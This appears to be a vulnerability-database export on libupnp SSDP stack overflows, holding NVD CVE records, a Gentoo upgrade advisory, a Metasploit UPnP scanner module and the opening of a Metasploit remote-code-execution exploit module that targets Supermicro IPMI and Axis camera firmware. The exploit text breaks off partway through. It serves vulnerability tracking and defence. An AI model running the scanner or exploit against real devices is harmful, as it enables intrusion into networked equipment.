"cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.14", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.11", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.6", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.3"], "id": "CVE-2012-5959", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5959", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.13:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.15:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.17:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.14:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.16:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) 1.3.1 allows remote attackers to execute arbitrary code via a long ServiceType (aka urn service) field in a UDP packet.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681 \"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. Any application linking to libupnp is likely to be affected\"", "edition": 4, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5964", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5964"], "modified": "2015-09-01T17:07:00", "cpe": ["cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1"], "id": "CVE-2012-5964", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5964", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) 1.3.1 allows remote attackers to execute arbitrary code via a long DeviceType (aka urn) field in a UDP packet.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681 \"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. Any application linking to libupnp is likely to be affected\"", "edition": 4, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5962", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5962"], "modified": "2015-09-01T17:05:00", "cpe": ["cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1"], "id": "CVE-2012-5962", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5962", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a long UDN (aka upnp:rootdevice) field in a UDP packet.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681 \"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. Any application linking to libupnp is likely to be affected\"", "edition": 6, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5960", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5960"], "modified": "2017-11-03T01:29:00", "cpe": ["cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.17", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.1", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.5", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.12", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.4", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.7", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.9", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.2", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.16", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.13", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.5", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.0", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.2", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.7", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.4", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.6", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.8", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.10", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.15", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.0", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.1", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.3", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.14", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.11", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.6", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.3"], "id": "CVE-2012-5960", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5960", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.13:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.15:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.17:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.14:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.16:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a UDP packet with a crafted string that is not properly handled after a certain pointer subtraction.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681\n\n\"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. Any application linking to libupnp is likely to be affected\"", "edition": 6, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5958", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5958"], "modified": "2020-11-28T19:15:00", "cpe": ["cpe:/a:libupnp_project:libupnp:1.4.4", "cpe:/a:libupnp_project:libupnp:1.6.1", "cpe:/a:libupnp_project:libupnp:1.4.7", "cpe:/a:libupnp_project:libupnp:1.6.10", "cpe:/a:libupnp_project:libupnp:1.6.11", "cpe:/a:libupnp_project:libupnp:1.6.4", "cpe:/a:libupnp_project:libupnp:1.4.5", "cpe:/a:libupnp_project:libupnp:1.4.3", "cpe:/a:libupnp_project:libupnp:1.6.15", "cpe:/a:libupnp_project:libupnp:1.6.3", "cpe:/a:libupnp_project:libupnp:1.6.13", "cpe:/a:libupnp_project:libupnp:1.6.17", "cpe:/a:libupnp_project:libupnp:1.6.16", "cpe:/a:libupnp_project:libupnp:1.6.14", "cpe:/a:libupnp_project:libupnp:1.6.0", "cpe:/a:libupnp_project:libupnp:1.6.2", "cpe:/a:libupnp_project:libupnp:1.4.6", "cpe:/a:libupnp_project:libupnp:1.6.12", "cpe:/a:libupnp_project:libupnp:1.6.6", "cpe:/a:libupnp_project:libupnp:1.6.9", "cpe:/a:libupnp_project:libupnp:1.6.5", "cpe:/a:libupnp_project:libupnp:1.6.7", "cpe:/a:libupnp_project:libupnp:1.4.2", "cpe:/a:libupnp_project:libupnp:1.4.0", "cpe:/a:libupnp_project:libupnp:1.4.1", "cpe:/a:libupnp_project:libupnp:1.6.8"], "id": "CVE-2012-5958", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5958", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:libupnp_project:libupnp:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.16:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.17:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.15:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.13:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.14:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.10:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2016-09-06T19:46:28", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958"], "edition": 1, "description": "### Background\n\nlibupnp is a portable, open source, UPnP development kit.\n\n### Description\n\nMultiple buffer overflow vulnerabilities have been discovered in libupnp. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll libupnp users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/libupnp-1.6.18\"", "modified": "2014-03-26T00:00:00", "published": "2014-03-26T00:00:00", "id": "GLSA-201403-06", "href": "https://security.gentoo.org/glsa/201403-06", "type": "gentoo", "title": "libupnp: Arbitrary code execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-12-17T16:23:47", "description": "Discover information from UPnP-enabled systems\n", "published": "2010-11-09T06:24:32", "type": "metasploit", "title": "UPnP SSDP M-SEARCH Information Discovery", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2013-0229", "CVE-2013-0230"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/SCANNER/UPNP/SSDP_MSEARCH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::UDPScanner\n\n def initialize\n super(\n 'Name' => 'UPnP SSDP M-SEARCH Information Discovery',\n 'Description' => 'Discover information from UPnP-enabled systems',\n 'Author' => [ 'todb', 'hdm'], # Original scanner module and vuln info reporter, respectively\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2012-5958'],\n ['CVE', '2012-5959'],\n ['CVE', '2013-0230'],\n ['CVE', '2013-0229']\n ]\n )\n\n register_options( [\n Opt::RPORT(1900),\n OptBool.new('REPORT_LOCATION', [true, 'This determines whether to report the UPnP endpoint service advertised by SSDP', false ])\n ])\n end\n\n def rport\n datastore['RPORT']\n end\n\n def setup\n super\n @msearch_probe =\n \"M-SEARCH * HTTP/1.1\\r\\n\" +\n \"Host:239.255.255.250:1900\\r\\n\" +\n \"ST:upnp:rootdevice\\r\\n\" +\n \"Man:\\\"ssdp:discover\\\"\\r\\n\" +\n \"MX:3\\r\\n\" +\n \"\\r\\n\"\n end\n\n def scanner_prescan(batch)\n print_status(\"Sending UPnP SSDP probes to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)\")\n @results = {}\n end\n\n def scan_host(ip)\n vprint_status \"#{ip}:#{rport} - SSDP - sending M-SEARCH probe\"\n scanner_send(@msearch_probe, ip, datastore['RPORT'])\n end\n\n def scanner_postscan(batch)\n print_status \"No SSDP endpoints found.\" if @results.empty?\n\n @results.each_pair do |skey,res|\n sinfo = res[:service]\n next unless sinfo\n\n bits = []\n\n [ :server, :location, :usn ].each do |k|\n bits << res[:info][k] if res[:info][k]\n end\n\n desc = bits.join(\" | \")\n sinfo[:info] = desc\n\n res[:vulns] = []\n\n if res[:info][:server].to_s =~ /MiniUPnPd\\/1\\.0([\\.\\,\\-\\~\\s]|$)/mi\n res[:vulns] << {\n :name => \"MiniUPnPd ProcessSSDPRequest() Out of Bounds Memory Access Denial of Service\",\n :refs => [ 'CVE-2013-0229' ]\n }\n end\n\n if res[:info][:server].to_s =~ /MiniUPnPd\\/1\\.[0-3]([\\.\\,\\-\\~\\s]|$)/mi\n res[:vulns] << {\n :name => \"MiniUPnPd ExecuteSoapAction memcpy() Remote Code Execution\",\n :refs => [ 'CVE-2013-0230' ],\n :port => res[:info][:ssdp_port] || 80,\n :proto => 'tcp'\n }\n end\n\n if res[:info][:server].to_s =~ /Intel SDK for UPnP devices.*|Portable SDK for UPnP devices(\\/?\\s*$|\\/1\\.([0-5]\\..*|8\\.0.*|(6\\.[0-9]|6\\.1[0-7])([\\.\\,\\-\\~\\s]|$)))/mi\n res[:vulns] << {\n :name => \"Portable SDK for UPnP Devices unique_service_name() Remote Code Execution\",\n :refs => [ 'CVE-2012-5958', 'CVE-2012-5959' ]\n }\n end\n\n if res[:vulns].length > 0\n vrefs = []\n res[:vulns].each do |v|\n v[:refs].each do |r|\n vrefs << r\n end\n end\n\n print_good(\"#{skey} SSDP #{desc} | vulns:#{res[:vulns].count} (#{vrefs.join(\", \")})\")\n else\n print_status(\"#{skey} SSDP #{desc}\")\n end\n\n report_service( sinfo )\n\n res[:vulns].each do |v|\n report_vuln(\n :host => sinfo[:host],\n :port => v[:port] || sinfo[:port],\n :proto => v[:proto] || 'udp',\n :name => v[:name],\n :info => res[:info][:server],\n :refs => v[:refs]\n )\n end\n\n if res[:info][:ssdp_host]\n report_service(\n :host => res[:info][:ssdp_host],\n :port => res[:info][:ssdp_port],\n :proto => 'tcp',\n :name => 'upnp',\n :info => res[:info][:location].to_s\n ) if datastore['REPORT_LOCATION']\n end\n end\n end\n\n def scanner_process(data, shost, sport)\n\n skey = \"#{shost}:#{datastore['RPORT']}\"\n\n @results[skey] ||= {\n :info => { },\n :service => {\n :host => shost,\n :port => datastore['RPORT'],\n :proto => 'udp',\n :name => 'ssdp'\n }\n }\n\n if data =~ /^Server:[\\s]*(.*)/i\n @results[skey][:info][:server] = $1.strip\n end\n\n ssdp_host = nil\n ssdp_port = 80\n location_string = ''\n if data =~ /^Location:[\\s]*(.*)/i\n location_string = $1\n @results[skey][:info][:location] = $1.strip\n if location_string[/(https?):\\x2f\\x2f([^\\x5c\\x2f]+)/]\n ssdp_host,ssdp_port = $2.split(\":\") if $2.respond_to?(:split)\n if ssdp_port.nil?\n ssdp_port = ($1 == \"http\" ? 80 : 443)\n end\n\n if ssdp_host and ssdp_port\n @results[skey][:info][:ssdp_host] = ssdp_host\n @results[skey][:info][:ssdp_port] = ssdp_port.to_i\n end\n\n end\n end\n\n if data =~ /^USN:[\\s]*(.*)/i\n @results[skey][:info][:usn] = $1.strip\n end\n\n end\n\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/upnp/ssdp_msearch.rb"}, {"lastseen": "2020-10-12T23:13:30", "description": "This module exploits a buffer overflow in the unique_service_name() function of libupnp's SSDP processor. The libupnp library is used across thousands of devices and is referred to as the Intel SDK for UPnP Devices or the Portable SDK for UPnP Devices. Due to size limitations on many devices, this exploit uses a separate TCP listener to stage the real payload.\n", "published": "2013-02-03T23:46:20", "type": "metasploit", "title": "Portable UPnP SDK unique_service_name() Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5958"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/UPNP/LIBUPNP_SSDP_OVERFLOW", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Portable UPnP SDK unique_service_name() Remote Code Execution',\n 'Description' => %q{\n This module exploits a buffer overflow in the unique_service_name()\n function of libupnp's SSDP processor. The libupnp library is used across\n thousands of devices and is referred to as the Intel SDK for UPnP\n Devices or the Portable SDK for UPnP Devices.\n\n Due to size limitations on many devices, this exploit uses a separate TCP\n listener to stage the real payload.\n },\n 'Author' => [\n 'hdm', # Exploit dev for Supermicro IPMI\n 'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>', # Exploit dev for Supermicro IPMI\n 'Richard Harman <richard[at]richardharman.com>', # Binaries, system info, testing for Supermicro IPMI\n 'Frederic Basse <contact[at]fredericb.info>' # Exploit dev for Axis Camera M1011\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-5958' ],\n [ 'OSVDB', '89611' ],\n [ 'US-CERT-VU', '922681' ],\n [ 'URL', 'https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play' ]\n ],\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'DefaultOptions' => { 'WfsDelay' => 10 },\n 'Payload' =>\n {\n#\n#\t\t\t\t\t# The following BadChars do not apply since we stage the payload\n#\t\t\t\t\t# through a secondary connection. This is just for reference.\n#\n#\t\t\t\t\t'BadChars' =>\n#\t\t\t\t\t\t# Bytes 0-8 are not allowed\n#\t\t\t\t\t\t[*(0..8)].pack(\"C*\") +\n#\t\t\t\t\t\t# 0x09, 0x0a, 0x0d are allowed\n#\t\t\t\t\t\t\"\\x0b\\x0c\\x0e\\x0f\" +\n#\t\t\t\t\t\t# All remaining bytes up to space are restricted\n#\t\t\t\t\t\t[*(0x10..0x1f)].pack(\"C*\") +\n#\t\t\t\t\t\t# Also not allowed\n#\t\t\t\t\t\t\"\\x7f\\x3a\" +\n#\t\t\t\t\t\t# Breaks our string quoting\n#\t\t\t\t\t\t\"\\x22\",\n\n # Unlimited since we stage this over a secondary connection\n 'Space' => 8000,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n # specific payloads vary widely by device (openssl for IPMI, etc)\n }\n },\n 'Targets' =>\n [\n\n [ \"Automatic\", { } ],\n\n #\n # ROP targets are difficult to represent in the hash, use callbacks instead\n #\n [ \"Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1\", {\n\n # The callback handles all target-specific settings\n :callback => :target_supermicro_ipmi_131,\n\n # This matches any line of the SSDP M-SEARCH response\n :fingerprint =>\n /Server:\\s*Linux\\/2\\.6\\.17\\.WB_WPCM450\\.1\\.3,? UPnP\\/1\\.0, Intel SDK for UPnP devices\\/1\\.3\\.1/mi\n #\n # SSDP response:\n #\tLinux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1\n #\thttp://192.168.xx.xx:49152/IPMIdevicedesc.xml\n #\tuuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice\n\n # Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03)\n\n } ],\n [ \"Axis Camera M1011 5.20.1 UPnP/1.4.1\", {\n\n # The callback handles all target-specific settings\n :callback => :target_axis_m1011_141,\n\n # This fingerprint may not be specific enough to be used automatically.\n #:fingerprint =>\n #\t/SERVER:\\s*Linux\\/2\\.6\\.31, UPnP\\/1\\.0, Portable SDK for UPnP devices\\/1\\.4\\.1/mi\n #\n # SSDP response:\n #\tLinux/2.6.31, UPnP/1.0, Portable SDK for UPnP devices/1.4.1\n #\thttp://192.168.xx.xx:49152/rootdesc1.xml\n #\tuuuid:Upnp-BasicDevice-1_0-00123456789A::upnp:rootdevice\n\n } 